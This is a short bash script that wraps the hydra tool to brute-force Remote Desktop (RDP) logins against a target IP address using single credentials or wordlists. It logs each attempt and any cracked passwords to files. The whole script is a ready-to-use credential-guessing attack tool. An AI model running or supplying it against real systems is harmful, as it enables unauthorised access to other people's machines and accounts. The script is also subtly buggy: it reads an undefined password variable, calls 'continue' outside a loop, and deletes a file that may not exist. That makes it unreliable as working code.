#!/bin/bash

#
#
<<DISCRIP
AUTH: HammerSoup
DESC: hydra script for rdp
DATE: 1/14/2022
INST: sudo ./hydraSCRIPT <user or filepath> <password or filepath> <ipaddress>
DISCRIP

#
#talking the input and placeing them into varibles
userorfile=$1
passwordorfile=$2
Ip_Adress1=$3

#
#taking varibles userorfile and paswordorfile and running them through a function that will give settings
#deppending on if its a file or not and then placeing them into a settings varible
function file_or_no_file()
{
	if [ -f $1 ]; then
		setting1=upper
	else
		setting1=down
	fi
	echo $setting1
}


usersettings=$(file_or_no_file $userorfile)
passwordsettings=$(file_or_no_file $passorfile)

#
#running the settings varibles through another function that will set the options for the hydra command based on if its a
#file or a just a string
function upordown()
{
	if [[ $1 = "upper" && $2 = "usersettings" ]]; then
		finalvalue="-L"
	elif [[ $1 = "down" && $2 = "usersettings" ]]; then
		finalvalue="-l"
	elif [[ $1 = "upper" && $2 = "passwordsettings" ]]; then
		finalvalue="-P"
	elif [[ $1 = "down" && $2 = "passwordsettings" ]]; then
		finalvalue="-p"
	fi
	echo $finalvalue
}


usersettings2="usersettings"
passwordsettings2="passwordsettings"
valueforuser=$(upordown $usersettings $usersettings2)
valueforpassword=$(upordown $passwordsettings $passwordsettings2)

#
#asking the user would like output or no output
#asking the user if they would like the output sent to a file or not
echo
read -p "would you like see the output yes or no [y/n]: " yesorno1
if [ $yesorno1 = "y" ]; then
	echo "option has bin set to yes"
else
	echo "option has bin set to no"
	yesorno1="n"
fi

echo
echo "note this option will only work if the first option has bin set to yes"
read -p "would you also like the output sent to files for orginization yes or no [y/n]: " yesorno2
if [ $yesorno2 = "y" ]; then
	echo "option has bin set to yes"
else
	echo "option has bin set to no"
	yesorno2="n"
fi

#
#deppending on the option you picked the final command will be outputted below
echo
if [ $yesorno1 = "y" ]; then
	hydra -V $valueforuser $1 $valueforpassword $2 rdp://$3
	if [ $yesorno2 = "y" ]; then
		hydra -V $valueforuser $1 $valueforpassword $2 rdp://$3 > testers.txt
		{
		echo
		echo "==========================================================="
		date "+%h %d %Y %T"
		echo "==========================================================="
		} >> ATTEMPTS.log
		{
		echo
		echo "==========================================================="
        	date "+%h %d %Y %T"
        	echo "==========================================================="
		} >> FOUND_PASSWORD.log
		cat testers.txt | grep ATTEMPT >> ATTEMPTS.log
		cat testers.txt | grep attacking >> FOUND_PASSWORD.log
		cat testers.txt | grep completed, >> FOUND_PASSWORD.log
		cat testers.txt | grep password: >> FOUND_PASSWORD.log
	else
		continue
	fi

else

	hydra $valueforuser $1 $valueforpassword $2 rdp://$3

fi
rm testers.txt
